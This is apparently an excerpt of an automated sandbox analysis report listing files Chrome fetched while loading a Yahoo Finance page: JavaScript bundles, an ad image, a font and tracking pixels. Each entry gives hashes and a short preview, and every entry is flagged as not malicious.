                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:function _createForOfIteratorHelper(b,t){var e="undefined"!=typeof Symbol&&b[Symbol.iterator]||b["@@iterator"];if(!e){if(Array.isArray(b)||(e=_unsupportedIterableToArray(b))||t&&b&&"number"==typeof b.length){e&&(b=e);var c=0,m=function b(){};return{s:m,n:function t(){return c>=b.length?{done:!0}:{done:!1,value:b[c++]}},e:function b(t){throw t},f:m}}throw new TypeError("Invalid attempt to iterate non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}var W=!0,d=!1,n;return{s:function t(){e=e.call(b)},n:function b(){var t=e.next();return W=t.done,t},e:function b(t){d=!0,n=t},f:function b(){try{W||null==e.return||e.return()}finally{if(d)throw n}}}}function _unsupportedIterableToArray(b,t){if(b){if("string"==typeof b)return _arrayLikeToArray(b,t);var e=Object.prototype.toString.call(b).slice(8,-1);return"Object"===e&&b.constructor&&(e=b.constructor.name),"Map"===e||"Set"===e?Array.from(b):"Arguments"===e||/^(?:Ui|I)nt(?:8|16|32)(?:Clamp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 25.12 (Windows), datetime=2024:09:11 20:32:09], baseline, precision 8, 728x90, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):69462
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.383170703460995
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:bFUkzEr7j2nYyZmBPyJuY4Rnld5anAUxf+4H3Lk8aiyTo31Tocnf/JlZAjEdu:CkvnwBbVRnlzy7jW1olRnplWIdu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E26F2FCBCAF5732DC972D3E44A6871CB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:169B43054F5C89602FE50CE1AE0565B63F946FB7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C64184F15A979E882FE02669F9392E6C5EAFE6D834209BD6159759E88883395D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B02097C2098AD0D9BC4C09DC2DE0154E48317C72DBC828943435842362AA76EC9999CE508073FA4036C51D1467AB6BC3B37F623BD543555A8012ED21220BA36D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s0.2mdn.net/sadbundle/3895761895101862695/Q3FY25_AURA_AWARENESS_COMPETITIVE_GEMINI_728x90/poster.jpg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.....*Exif..MM.*.............................b...........j.(...........1..... ...r.2...........i....................'.......'.Adobe Photoshop 25.12 (Windows).2024:09:11 20:32:09.......................................Z..............................."...........*.(.....................2...................H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..[...],}.:v.[K.c.C+....2.)vC...Hs..#.rw-...z..~I..i.cX..Y.^....:..[....?2..U.........:Cs-..U........._.d..7.Il@.8... rF.O..c.....~...(.G.[..v.+<..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (324)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):325
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.712604020443725
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:AlvKmWWNSM3tmIj/WM4R1XzW+TPe5kASTmZvMRbe4hXBWUV2HiNlv:ARSki/1C+T7ASUSeDUVq+1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:87BE50D095B667E85C7A7C16928CE749
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:719F9E2B34C1BBF9F2E6172BFB731677988181F6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:17DE704AC449FB082695A05404C1B45105FF8C73590B500D2995F8364F13E167
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:89903265FB51504B7D534CAF87D0EFAFEDB9B5C0BA6A7F8216EF88CDEA100644D0A8D35A585FC9A40517F1F3C2981AD15AB062EC539736A75D77BFA3E19AD992
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:function s(){const e=window._nimbus.resizeObserver;return e||(window._nimbus.resizeObserver=new ResizeObserver(n=>{for(const r of n)r.target.dispatchEvent(new CustomEvent("resize",{detail:{entry:r,observer:window._nimbus.resizeObserver}}))}))}function i(e){return s().observe(e),{destroy(){s().unobserve(e)}}}export{i as r};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4348), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.175097086994074
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:3haIoq1mr8gYdYjeL+Pvq51pNAcllADTyBnmYCoqvpt4bIs:3uuA8gYSjeL+XI1pNZlls+CA3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:681D57E9E7CBEF5DE44544C13F8CA62E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:65CFB6398D61FE7CAC86C90DC042095D8E3CD623
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF70829B2E58AFC016C35CE9A83E2BB60AD24D6341491686EE168EE71C40123F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:2A131198DBB855882D7C7B687650B57133C4375FCEA4E4A86D338A78DCAEAFC18DC5477593429B6B1A599419F108F4BEBE7588BAE7C7831B5EA87D6C2BDF65C6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/wf/wf-countdown-1.2.5-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-countdown",[],t):"object"==typeof exports?exports["wafer-countdown"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-countdown"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var o=n[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var n={};return t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,n){"use strict";function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a functi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pbs.yahoo.com/setuid?bidder=openx&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1&f=i&uid=d23c890c-93a2-0051-1cdd-46d7ce72c695
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (532)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):533
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.670528886422098
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:eT9mc4sl3O9Mtk/CIv4Sbx7WiPorWhFMDFQ3m4yy/0U2Xdv6j0VvKpVkQoLnLS7A:eR10MSJbx7TPXTMDFQ370Usd8k/HoDk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:88F5B4E659159BF2B0E6DE4B8B09CC0E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1A2F1531158A51BA2D776A97A9724AB2B3CF7A4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B31DF7EB98896B4E334E1327685A4A0CB06293B21EC4882C0415DDC9F9AE9B7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6D9D1813D42E9AE80F17FD332BD5BDAC9466BB12F750AD058216B7738C81BF727706E242DAA62BA2F560F4DB3DD451EA8A6AA9DC7BDB5E4BF7F908F0BE8AD8E9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const c='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path fill-rule="evenodd" d="M17 8V6c0-2.76-2.24-5-5-5S7 3.24 7 6v4h.2c-1.12 0-1.68 0-2.108.218a2 2 0 0 0-.874.874C4 11.52 4 12.08 4 13.2v5.6c0 1.12 0 1.68.218 2.108a2 2 0 0 0 .874.874C5.52 22 6.08 22 7.2 22h9.6c1.12 0 1.68 0 2.108-.218a2 2 0 0 0 .874-.874C20 20.48 20 19.92 20 18.8v-5.6c0-1.12 0-1.68-.218-2.108a2 2 0 0 0-.874-.874C18.48 10 17.92 10 16.8 10h.2zm-1.9 2H8.9V6c0-1.71 1.39-3.1 3.1-3.1s3.1 1.39 3.1 3.1z" clip-rule="evenodd"/></svg>';export{c as l};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 65176, version 1.0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):65176
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.996782865840981
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:dJDFHWg/7CxUjbXmJ9U10h5An23d5X0LcpSOwHfvMQv:dJT/7CxUvmKgAakLcpSpHfU0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4DF4FCE99E5A3C3D1493112A0159071
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D6CE384A32EC1D859406D6E4EBE3FE547DB3B82A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C77AC0AA1AA3C9715CACB1FC76FEAF226E30927A9636E5C75C4DFEB75C0F8F98
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AF1F4EFF0DEB18BA2628D82BB6CA16D6340DC797A438B13F29929DB1548155F82FD1840D18C275438F5EC251A6E82670E2FF89477F1334E1CD45422E02E8EEDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/cv/apiv2/ngy-fonts/YahooSans-VF-Web.woff2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:wOF2..............^....*........................../......z?HVAR.w.`?STAT..../d......O..6.0..F.6.$..f. ..|..9[.G....h,j+n..mD.gn.V....<..c1=..2..~.....v.^........%..[3.......f..f..?.aD.......y..T..;O.s~.......r~{.?..t.v. .D.K_...tV...7.J..-2.:F.DDD....;.j.....uRh.e<.(..JD..g.SE..6<...4..{Q....4a!..D...)`..B5..%.9..%a.....ga..2z.l....J......l.*...y"[.W ..,# .*gL.3~..Y.S.sx..7.b*....TAT..!..~6<..`....|E...S.W.|7..^.a....%2.KJ.Iu;...Z3".|.!..D..!,.S.."W]z..O.>..`r...PJ,.9)D..k<n.@.%..^N...b...`.E..w.#........SE.'..M.vG.e'.2.._......m....w494.._........~.}N...^h...QmF.;.~U...q.........u.Q....p.5.l.(...U.~.....5c.3q:..[S..s.y..(J...V.....bc.haTY.Qg..W.V\xQi......g.....'\.o.".....=..BI..A.d|....7'&.!...o..5D;K..W<tJ j..Cs+..%.&.0.........>N.1...).aP..G.co..6...s.c.....?6..&Q...`lx_.)....0u.....}.1...6..&mv...D&....M.. .L..aXDd.D.)Md...I.AL.I....5}.-./n3.tS..5.q..%.~.r^h.e.n./..CJ69... .......T..g.....}.3.z....%.7.":%......'Z4\.....0....M?.NE.8)ZjHVr.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:"https://pagead2.googlesyndication.com/pcs/activeview?xai=AKAOjsuRHVpgx1vWeXFPhRUWFxkXnTGRPiMemndR07ZWKX4D7olShCuxY1bQsQAVsFdgRyQv4ifunJXyODKs7-WdjT9DnoXSjoIw-y2_wmdnVOIqE1nyosyJ_pjqB4ZfgjoGeCyh3IRiePs9mU3haBo6DL-TRFuOPMOSc0FPoh5r7hkeZ4REnVFmXYlD4aZ2rVCQKew&sai=AMfl-YTcjbHP1pCObS4viK6C2P861cbn-YSXd69FobFDEZEVZckcW4aej8VrzOYaKJO3pHu_iMQ6gQJjxrkg2TrYkBasr4U0sAw8UPY2IrdX6SSti6xSWwmRBPk2bA8&sig=Cg0ArKJSzA4IZW6X1fLzEAE&cid=CAQSOwDpaXnfaUTXaJXXKt5LmxpO2ea3XLHhsRZ6eVJQnKh_Kia1wLbdUIXINXzxbo2zEOrtGxXTy1RESuhfGAE&id=lidartos&mcvt=9541&p=24,276,114,1004&tm=9660.299999999988&tu=119.5&mtos=9541,9541,9541,9541,9541&tos=9541,0,0,0,0&v=20241007&bin=7&avms=nio&bs=0,0&mc=1&if=1&app=0&itpl=20&adk=4039402601&rs=4&la=0&cr=0&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0%3D&vs=4&r=b&co=2434773501&rst=1728414929420&rpt=6149&isd=0&lsd=0&ec=1&met=ie&wmsd=0&pbe=0&fle=0&vae=0&spb=0&sfl=0&ffslot=0&reach=8&io2=0"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:"https://dt.adsafeprotected.com/dt?advEntityId=2233400&asId=38c6b108-4dfa-76fb-59d4-d5cea654b422&tv=%7Bc:qyx4Ax,pingTime:-6,time:264,type:i,es:0,sc:1,ha:1,fgad:1,fif:0,gmnp:0,for:0,b11:0,cnod:1,gm:0,slTimes:%7Bi:0,o:264,n:0,pp:0,pm:0%7D,slEvents:%5B%7Bsl:o,t:111,wc:0.0.1280.984,ac:NaN.NaN.728.90,am:i,cc:NaN.NaN.728.90,piv:0,obst:0,th:0,reas:r,bkn:%7Bpiv:%5B221~0%5D,as:%5B221~728.90%5D%7D%7D%5D,slEventCount:1,em:true,fr:false,e:,tt:rjss,dtt:0,fm:uqDOUlz+11%7C12%7C13%7C14%7C151%7C16%7C1711%7C1712%7C1713%7C1714%7C1715%7C1716%7C1717%7C1718%7C1719%7C171a%7C171b%7C171c%7C171d%7C171e%7C171f%7C171g%7C171h%7C171i%7C171j%7C171k%7C172%7C1731%7C1732%7C18%7C19%7C1a1%7C1a2%7C1a3%7C1a4%7C1a5%7C1a6%7C1b%7C1c%7C1d%7C1e%7C1f%7C1g11%7C1g12%7C1g2%7C1h%7C1i%7C1j%7C1k%7C1l1%7C1m%7C1n%7C1o%7C1p%7C1q%7C1r*.2233400-82744863%7C1r1,idMap:1r*,rmeas:1,rend:0,renddet:svg.us,siq:121%7D&tpiLookup=ao:finance.yahoo.com*&br=c"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65105)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):166400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.544397935214867
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:HARJVyQB8BKZIfGLUbJZWGG8iUtdOaeX+aNdhUDAfzJf0OJXNOUA5dJxE1VZ+:grxiUIfGLmJZWGGLUPOacJfzDJ8dnEXk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:76062635F7CE8E4794320E128B95796C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:85137643FFE13E23E638F2C67CD88632287EBFF8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:78AAA651BB3D42BA918525E3DFCEA79F03FE13C7AFC6175888B4E53D8FAAC614
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:22D053FB88B76F5EE6A1BA991BEC22D21C739BFFB26AD0ABD3E7003B4A27C17769BE35FFD8A542DDCB98ECB42CBBD62D4DF3746E38CB0AB799F20CD5872BE350
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Dock.DnH4WZuW.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const __vite__fileDeps=["./Sparkline.D1F12_MV.js","./scheduler.Dr9AAxFe.js","./index.DCSmZEjO.js","./each.BExQfwb4.js","./spread.CgU5AtxT.js","./Sparkline.svelte_svelte_type_style_lang.BXw0JgFc.js","../assets/Sparkline.CfnaMg_z.css","./commonUtil.CI22_Irn.js","./stores.DPDRpTFd.js","./43.CtYdpA_T.js","./control.CYgJF_JY.js","./loadSparkline.P-xwuGpq.js","./logUtil.hOue7iAU.js"],__vite__mapDeps=i=>i.map(i=>__vite__fileDeps[i]);.import{s as pe,c as rt,e as M,b as U,d as P,f as T,j as B,i as g,q as y,U as ie,k as w,l as D,u as at,g as ft,a as ct,t as Z,h as J,m as me,n as le,p as ee,a0 as Ye,A as Ie,T as lt,V as _t,_ as De,X as Xs,y as $t,Q as Ut,o as nt,D as rs,N as $e,P as _e,R as ye,a9 as q,G as gl,x as bl,Y as ht,F as Qs,J as Cl,K as Nl,a4 as Zs,r as Js,I as xs,au as ei}from"./scheduler.Dr9AAxFe.js";import{S as we,i as Ee,g as X,a as p,e as Q,t as h,c as L,b as A,m as C,d as N,f as gt,h as Se}from"./index.DCSmZEjO.js";import{g as ti}from"./globals.D0QH3NT1.js";import{e as Ue,u as Jt,o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (3179)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.351273126862215
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:HrFMPdrPjmx8ciWmUJ6T2AhO6dGeA729RVItTR3+K2WraHNy9I3ZiF1l1wu:CPdrPS/mUW26O6dJAy9glloiI3ZiF17
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E5967E3E82ADB3F92A4D5194241E7E4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F725BB853867265B3EBA19865C283D36FA4929BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:90C2985AB8A7ADB8D615894ECE408C7E52296B312AD84BCA52C49558735D0E72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:08D20B91CAD1ACB0D93191CF073CAD71972E6B708EF8C97BB9B9A98C3C5CF3A4FA5C7807ADCAF537A3A8AB75B57409CD0E77CCF27816970DDA7F558D6C3B678E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as A,p as M,k as E,i as b,Y as N,A as q,T as D,c as F,e as G,d as H,f as I,a8 as U,U as x,u as J,g as K,a as L}from"./scheduler.Dr9AAxFe.js";import{S as O,i as Q,t as P,a as Y}from"./index.DCSmZEjO.js";import{g as R}from"./spread.CgU5AtxT.js";var j=(e=>(e.heading="heading",e.body="body",e.ui="ui",e.section="section",e))(j||{}),d=(e=>(e.h1="h1",e.h2="h2",e.h3="h3",e.h4="h4",e.h5="h5",e.h6="h6",e.span="span",e.p="p",e.div="div",e.section="section",e.article="article",e.aside="aside",e.header="header",e.footer="footer",e.ul="ul",e.ol="ol",e.li="li",e.dl="dl",e.dt="dt",e.dd="dd",e.tr="tr",e.td="td",e.th="th",e.caption="caption",e.label="label",e))(d||{}),B=(e=>(e.xxxs="xxxs",e.xxs="xxs",e.xs="xs",e.sm="sm",e.md="md",e.lg="lg",e.xl="xl",e.xxl="xxl",e.xxxl="xxxl",e))(B||{}),z=(e=>(e.bold="bold",e.med="med",e.reg="reg",e))(z||{});const _={heading:["xxxs","xxs","xs","sm","md","lg","xl","xxl"],ui:["xs","sm","md","lg","xl","xxl"],body:["xs","sm","md","lg","xl"],section:["xs","sm","md","
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (596), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):596
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.37523849141732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:kxPBrtj8KBGd+AMWGQL8BMDMgbpbWWGVUli8KBGqHAUm4WD0wYNWQ:kFIKBG4eGVBqb/GafKBGqtm4PNIQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:BCB921015E440A5199000C0A3D171D34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EA5A45992D194861B41DC977FCFAF947049D144F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:7C4EE1E0E99E3096F07F2E23D640A4FFF495B07F92674D05F88FAD04F14248A8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:C91225DC2C2D8DC7C0702435AC82BAD868A5AD3CECB012E9998924D2D8F9B8644E7B19220C106992AC6FBFA4DE1E57CBC7FD5C80DCC61B44409961314C419A19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://googleads.g.doubleclick.net/xbbe/pixel?d=CIuw7wEQ3bWDAhjl2umeAjAB&v=APEucNX6s2vbvJcs_CodrLZVTkAkhx9mRuiq0o4IDYhnjWh2MOzu5BYdIVE8_r85DynmmG-SD_hfgjkmsfnQM6yg7EvtCHFt1w
